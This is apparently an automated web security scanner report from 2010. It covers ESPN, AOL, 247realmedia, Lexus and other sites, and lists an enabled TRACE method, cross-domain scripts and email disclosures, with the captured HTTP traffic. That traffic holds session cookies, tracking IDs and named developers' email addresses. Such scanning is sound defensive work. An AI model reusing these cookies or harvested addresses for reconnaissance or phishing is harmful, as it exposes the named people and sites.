GET /minorlbb/teams HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289100691517_533924%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%7D; jt_time=1289100691490; s_sess=%20s_ppv%3D95%3B; fsr.a=1289100690678; CRBLM_LAST_UPDATE=1289019281; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020738304%7C1383628738304%3B%20s_c24_s%3DFirst%2520Visit%7C1289022538304%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022538320%3B; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; SEEN2=cAMLBtEOcAMLBtEOcAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=30 Date: Sun, 07 Nov 2010 06:25:56 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sun, 07 Nov 2010 05:43:08 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN34 Cache-Expires: Sun, 07 Nov 2010 05:43:46 GMT Content-Length: 108094 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <link rel="stylesheet" href="http://a.espncdn.com/prod/styles/modules/master_tables_09.r3.css" type="text/css" media="screen" charset="utf-8" /> <script src="http://a.espncdn.com/combiner/c?js=jquery-1.4.2.1.js,plugins/json2.r3.js,plugins/teacrypt.js,plugins/jquery.metadata.js,plugins/jquery.bgiframe.js,plugins/jquery.easing.1.3.js,plugins/jquery.hoverIntent.js,plugins/jquery.jcarousel.js,plugins/jquery.tinysort.r3.js,plugins/jquery.pubsub.r5.js,ui/1.8.2/jquery.ui.core.js,ui/1.8.2/jquery.ui.widget.js,ui/1.8.2/jquery.ui.tabs.js,ui/1.8.2/jquery.ui.accordion.js,plugins/ba-debug-0.4.js,espn.l10n.r4.js,swfobject/2.2/swfobject.js,flashObjWrapper.r7.js,espn.core.duo.r46.js,stub.search.r3.js,espn.nav.mega.r16.js,espn.storage.r6.js,espn.p13n.r7.js,espn.video.r30.js,registration/staticLogin.r10-11.js,registration/espn.overlay.stub.r3-8.js,espn.insider.r5.js,espn.espn360.stub.r7.js,espn.myHeadlines.stub.r8.js,espn.myfaves.stub.r3.js,tsscoreboard.20090612.js,%2Fforesee_v3%2Fforesee-alive.js,espn.gallery.0908a.js"></script> <script language="JavaScript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2060"></script> ...[SNIP]... %3d0:65:712598:65%26a%3d1%26goto%3d;pc=dig712598dc792858;ord=2010.11.06.22.25.56?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'> <SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N3340.espn/B4835979.9;abr=!ie;sz=728x90;click=http://log.go.com/log?srvc%3dsz%26guid%3d578CADA1-41C2-4AAE-A741-F5464997B0A1%26drop%3d0%26addata%3d0:65:712598:65%26a%3d1%26goto%3d;pc=dig712598dc792858;ord=2010.11.06.22.25.56?"> </SCRIPT> ...[SNIP]... </script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script> ...[SNIP]... <!-- BEGIN STANDARD TAG - 160 x 600 - AR-PUBLISHER:31:espn:1228263135646150: AR-CHANNEL:180:Run of Site:1228263136676785 - DO NOT MODIFY --> <SCRIPT TYPE="text/javascript" SRC="http://ad.yieldmanager.com/st?ad_type=ad&ad_size=160x600§ion=481057"></SCRIPT> ...[SNIP]...
GET /nba/gamecast HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289100691517_533924%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%7D; jt_time=1289100691490; s_sess=%20s_ppv%3D95%3B; fsr.a=1289100690678; CRBLM_LAST_UPDATE=1289019281; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020738304%7C1383628738304%3B%20s_c24_s%3DFirst%2520Visit%7C1289022538304%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022538320%3B; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; SEEN2=cAMLBtEOcAMLBtEOcAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=30 Date: Sun, 07 Nov 2010 06:43:57 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sun, 07 Nov 2010 00:47:52 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN04 Cache-Expires: Sun, 07 Nov 2010 00:48:52 GMT Content-Length: 10394 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
GET /nba/schedule HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289100691517_533924%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%7D; jt_time=1289100691490; s_sess=%20s_ppv%3D95%3B; fsr.a=1289100690678; CRBLM_LAST_UPDATE=1289019281; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020738304%7C1383628738304%3B%20s_c24_s%3DFirst%2520Visit%7C1289022538304%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022538320%3B; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; SEEN2=cAMLBtEOcAMLBtEOcAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=30 Date: Sun, 07 Nov 2010 06:56:14 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sun, 07 Nov 2010 06:55:35 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN12 Cache-Expires: Sun, 07 Nov 2010 06:56:35 GMT Content-Length: 71026 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
GET /lms_ct/m2iGLSCH/index.asp?UserType=cricinfo_na_text_cpm HTTP/1.1 Host: www.icicibankm2i.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 06:10:30 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 10168 Content-Type: text/html Expires: Sat, 06 Nov 2010 18:30:00 GMT Set-Cookie: USER=USERTYPE=cricinfo%5Fna%5Ftext%5Fcpm&USERURL=UserType%3Dcricinfo%5Fna%5Ftext%5Fcpm; path=/ Set-Cookie: ASPSESSIONIDSCAAAQSC=GCIEBDPCNHDMKBPMLMIMHHCD; path=/ Cache-control: private
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Cont ...[SNIP]... <!--Script for Capturing data for Web Trends --> <SCRIPT language=JavaScript src="http://www.icicibank.com/pfsuser/js/webtrends_indnl.js" type=text/javascript></script> ...[SNIP]...
The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.
Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.
Issue remediation
The TRACE method should be disabled on the web server.
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
The following email address was disclosed in the response:
e60viewers@espn.com
Request
GET /espn/e60/index HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289100691517_533924%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%7D; jt_time=1289100691490; s_sess=%20s_ppv%3D95%3B; fsr.a=1289100690678; CRBLM_LAST_UPDATE=1289019281; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020738304%7C1383628738304%3B%20s_c24_s%3DFirst%2520Visit%7C1289022538304%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022538320%3B; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; SEEN2=cAMLBtEOcAMLBtEOcAMLBtEO:;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 05:43:32 GMT Content-Type: text/html; charset=iso-8859-1 Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN15 Cache-Expires: Sun, 07 Nov 2010 04:27:32 GMT Content-Length: 52137 Cache-Control: no-cache Pragma: no-cache Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="mailto:e60viewers@espn.com"> ...[SNIP]...
The following email address was disclosed in the response:
jack@colorpowered.com
Request
GET /p5/_v36.9/js/main.js HTTP/1.1 Host: portal.aolcdn.com Proxy-Connection: keep-alive Referer: http://www.aol.com/?ncid=bannadusaolp00000044 Cache-Control: max-age=0 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: public, max-age=30374803 Expires: Mon, 24 Oct 2011 19:38:11 GMT Date: Sun, 07 Nov 2010 06:11:28 GMT Connection: close Content-Length: 155499
/* Sonar v3 */ Sonar=function(k){var e=3,c=k||0,j=[],b=0,f=function(){var o,n=j,m,d=n.length,p;for(m=0;m<d;m++){o=n[m];p=o.px||c;if(h.detect(o.obj,p)){o.call(o.obj);n.splice(m,1);m--;d--;if(n.length== ...[SNIP]... |{};h.elem=this;e.aolShare(h)})}})(jQuery,window,document); // ColorBox v1.3.9 - a full featured, light-weight, customizable lightbox based on jQuery 1.3 // c) 2009 Jack Moore - www.colorpowered.com - jack@colorpowered.com // Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php (function(b,gb){var v="none",t="click",N="LoadedContent",d=false,x="resize.",o="y",u="auto",f=true,M="nofollow",q= ...[SNIP]...
HTTP/1.1 200 OK Content-Length: 12136 Content-Type: application/x-javascript Last-Modified: Thu, 28 Aug 2008 15:32:22 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: MESPN15 Cache-Expires: Fri, 18 Jun 2010 20:09:46 GMT X-UA-Compatible: IE=EmulateIE7 Cache-Control: max-age=81188 Date: Sun, 07 Nov 2010 05:36:35 GMT Connection: close
The following email address was disclosed in the response:
Ari.Bluman@247realmedia.com
Request
GET /EN-US/contact/New_york.html HTTP/1.1 Host: www.247realmedia.com Proxy-Connection: keep-alive Referer: http://www.247realmedia.com/EN-US/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnneEkywplMABILw; NSC_xxx_qppm_iuuq=ffffffff0949011c45525d5f4f58455e445a4a423660; OAS_SC1=1289101156255; imgCount=11
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 03:39:59 GMT Server: Apache Last-Modified: Mon, 18 Oct 2010 21:43:07 GMT ETag: "15a402c-57fe-fce70c0" Accept-Ranges: bytes ntCoent-Length: 22526 P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Connection: close Content-Type: text/html Cache-Control: private Content-Length: 22526
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... <br /> Ari.Bluman@247realmedia.com</div> ...[SNIP]...
The following email address was disclosed in the response:
info@247realmedia.com
Request
GET /EN-US/contact/favicon.ico HTTP/1.1 Host: www.247realmedia.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnneEkywplMABILw; NSC_xxx_qppm_iuuq=ffffffff0949011c45525d5f4f58455e445a4a423660; imgCount=11; OAS_SC1=1289101161567
Response
HTTP/1.1 404 Not Found Date: Sun, 07 Nov 2010 03:40:01 GMT Server: Apache Last-Modified: Tue, 03 Aug 2010 12:13:59 GMT ETag: "13ec03c-7baa-407ccfc0;fce70c0" Accept-Ranges: bytes ntCoent-Length: 31658 P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Connection: close Content-Type: text/html Cache-Control: private Content-Length: 31658
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... <a href="mailto:info@247realmedia.com">info@247realmedia.com</a> ...[SNIP]...
The following email address was disclosed in the response:
info@247realmedia.com
Request
GET /EN-US/favicon.ico HTTP/1.1 Host: www.247realmedia.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnneEkywplMABILw; NSC_xxx_qppm_iuuq=ffffffff0949011c45525d5f4f58455e445a4a423660; OAS_SC1=1289101156255; imgCount=11
Response
HTTP/1.1 404 Not Found Date: Sun, 07 Nov 2010 03:39:57 GMT Server: Apache Last-Modified: Tue, 03 Aug 2010 12:13:59 GMT ETag: "13ec03c-7baa-407ccfc0;8dba4f40" Accept-Ranges: bytes Cteonnt-Length: 31658 P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Connection: close Content-Type: text/html Cache-Control: private Content-Length: 31658
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... <a href="mailto:info@247realmedia.com">info@247realmedia.com</a> ...[SNIP]...
HTTP/1.1 200 OK Server: Apache Last-Modified: Tue, 10 Aug 2010 07:43:26 GMT Accept-Ranges: bytes Cache-Control: max-age=31536000 Expires: Wed, 10 Aug 2011 11:32:56 GMT Vary: Accept-Encoding Content-Type: application/javascript Date: Sun, 07 Nov 2010 03:17:11 GMT Connection: close Content-Length: 37191
/* SiteCatalyst code version: H.15.1. Copyright 1997-2007 Omniture, Inc. More info available at http://www.omniture.com */ /************************ ADDITIONAL FEATURES ************************
The following email address was disclosed in the response:
scott@filamentgroup.com
Request
GET /js/jquery.js,jquery.plugins.js,common.js,screen.js HTTP/1.1 Host: www.filamentgroup.com Proxy-Connection: keep-alive Referer: http://www.filamentgroup.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: exp_last_visit=973766597; exp_last_activity=1289126597; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; __utmz=12934432.1289097771.1.1.utmcsr=jqueryui.com|utmccn=(referral)|utmcmd=referral|utmcct=/about; __utma=12934432.1716523458.1289097771.1289097771.1289097771.1; __utmc=12934432; __utmb=12934432.1.10.1289097771; enhanced=pass
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 02:43:18 GMT Server: Apache/2.0.52 (CentOS) X-Powered-By: PHP/4.3.9 Cache-Control: max-age=29030400, public Expires: Sun, 09 Oct 2011 02:43:18 GMT Connection: close Content-Type: text/javascript Content-Length: 86567
/*! * jQuery JavaScript Library v1.4.2 * http://jquery.com/ * * Copyright 2010, John Resig * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * Includes S ...[SNIP]... ):this.css(d,typeof f==="string"?f:f+"px")}});A.jQuery=A.$=c})(window);
/** * -------------------------------------------------------------------- * jQuery collapsible plugin * Author: Scott Jehl, scott@filamentgroup.com * Copyright (c) 2009 Filament Group * licensed under MIT (filamentgroup.com/examples/mit-license.txt) * note: modified to exclude jquery animations, title tip the cue text, and also to find parent ...[SNIP]...
The following email addresses were disclosed in the response:
cyap@dhapdigital.com
ernesto@dhapdigital.com
Request
GET /lexus-share/css/lexus_3_5.css HTTP/1.1 Host: www.lexus.com Proxy-Connection: keep-alive Referer: http://www.yourlexusdealer.com/Houston/index.html?model=RX Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache Last-Modified: Tue, 19 Oct 2010 18:50:21 GMT ETag: "244ed-1dd62-c3c93540" Accept-Ranges: bytes Content-Type: text/css Cache-Control: max-age=147604 Expires: Mon, 08 Nov 2010 23:10:20 GMT Date: Sun, 07 Nov 2010 06:10:16 GMT Connection: close Vary: Accept-Encoding Set-Cookie: Apache=64.211.162.79.120911289110216996; expires=Wed, 22-Aug-2012 17:30:00 GMT; path=/ Content-Length: 122210
/* This is a generated file. Do not edit. Edit the individual js files and regenerate the home page. */ /*====styleGlobal.css - GLOBAL DEFAULTS ====*/
/*body*/ body { margin: 0; padding: 0; ...[SNIP]... ayComponent.css - GENERIC OVERLAY ====*/ /** * Styles for Generic Overlay Component - * Do NOT modify this file for a specific overlay implementation. * Create * @author B. Ernesto Johnson (ernesto@dhapdigital.com) * @author Chris Yap (cyap@dhapdigital.com) */
The following email addresses were disclosed in the response:
apederson@dhapdigital.com
cyap@dhapdigital.com
ernesto@dhapdigital.com
geoff@deconcept.com
matthias@knallgrau.at
sam@conio.net
Request
GET /lexus-share/js/lexus_3_5.js HTTP/1.1 Host: www.lexus.com Proxy-Connection: keep-alive Referer: http://www.yourlexusdealer.com/Houston/index.html?model=RX Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache Last-Modified: Tue, 05 Oct 2010 17:53:46 GMT ETag: "227b8-64f3f-57a65e80" Accept-Ranges: bytes Content-Type: application/x-javascript Cache-Control: max-age=147699 Expires: Mon, 08 Nov 2010 23:11:55 GMT Date: Sun, 07 Nov 2010 06:10:16 GMT Connection: close Vary: Accept-Encoding Set-Cookie: Apache=64.211.162.79.120911289110216997; expires=Wed, 22-Aug-2012 17:30:00 GMT; path=/ Content-Length: 413503
/* This is a generated file. Do not edit. Edit the individual js files and regenerate the home page. */ /* Prototype JavaScript framework, version 1.4.0 * (c) 2005 Sam Stephenson <sam@conio.net> ...[SNIP]... lement = Event.element(event); element.blur(); }
}
/** * @fileoverview nav_top_vehiclebar.js contains all components for the Vehicle Navigation menu. * @author Aaron J Pedersen (apederson@dhapdigital.com) * <br/> ...[SNIP]... <matthias@knallgrau.at> ...[SNIP]... <matthias@knallgrau.at> ...[SNIP]... bar=no,toolbar=no,location=no,status=no'); } } /* * FlashObject embed * http://blog.deconcept.com/2004/10/14/web-standards-compliant-javascript-flash-detect-and-embed/ * * by Geoff Stearns (geoff@deconcept.com, http://www.deconcept.com/) * * v1.0.7 - 11-17-2004 * * Create and write a flash movie to the page, includes detection * * Usage: * * myFlash = new FlashObject("path/to/swf.swf", "swfi ...[SNIP]... ; dynamicLibraryLoader = new DynamicLibraryLoader();
/** * @fileoverview lexusDynamicLoader.js contains all functions for loading "as needed" javascript libraries. * @author Ernesto Johnson (ernesto@dhapdigital.com) * @author Chris Yap (cyap@dhapdigital.com) * <br/> ...[SNIP]... .DISCOVERY = '/discoveryOverlay/discoveryOverlay.html';
/** * @fileoverview overlayTracking.js is used for Omniture Tracking the Generic Overlay Component and Gallery * @author Ernesto Johnson (ernesto@dhapdigital.com) * <br/> ...[SNIP]...
The following email address was disclosed in the response:
info@precisionir.com
Request
GET / HTTP/1.1 Host: www.wilink.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 02:09:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: public, max-age=900 Expires: Sun, 07 Nov 2010 02:24:17 GMT Last-Modified: Sun, 07 Nov 2010 02:09:17 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 9744
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Welcome to PrecisionIR.com</title>
The following email address was disclosed in the response:
info@precisionir.com
Request
GET /info_request.aspx?pageID=comments HTTP/1.1 Host: www.wilink.com Proxy-Connection: keep-alive Referer: http://www.wilink.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 02:09:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 7049
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html> <head> <title>PrecisionIR.com :: Contact Us</title>
